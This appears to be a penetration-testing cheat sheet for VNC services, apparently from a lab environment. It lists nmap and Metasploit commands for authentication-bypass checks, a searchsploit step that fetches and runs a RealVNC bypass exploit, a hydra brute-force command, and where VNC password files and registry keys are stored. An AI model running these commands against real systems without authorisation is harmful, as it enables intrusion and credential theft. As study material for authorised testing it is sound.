VNC - TCP 5800 (HTTP/Java viewer) and TCP 5900 (RFB; display :N listens on 5900+N)
#nmap
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13
#metasploit
use auxiliary/scanner/vnc/vnc_none_auth
set rhosts 10.11.1.13
set rport 5800
set threads 1
run
#RealVNC 4.1.0/4.1.1 - Authentication Bypass - Exploit will prompt for target IP
sudo searchsploit -m windows/remote/36932.py
python2 36932.py #input target IP
Shell
#hydra
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV
#Default location of the stored VNC password
Linux
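By default the VNC password file is stored in: ~/.vnc/passwd
The file is only obfuscated with a fixed key, not hashed, so treat it as equivalent to the plaintext password: keep it mode 0600 and out of backups and shared images.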
Windows
# RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
# TigerVNC
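HKEY_CURRENT_USER\Software\TigerVNC\WinVNC4
(originally listed under "HKEY_LOCAL_USER", which is not a Windows registry hive; confirm on the host whether the key is under HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE)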
# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini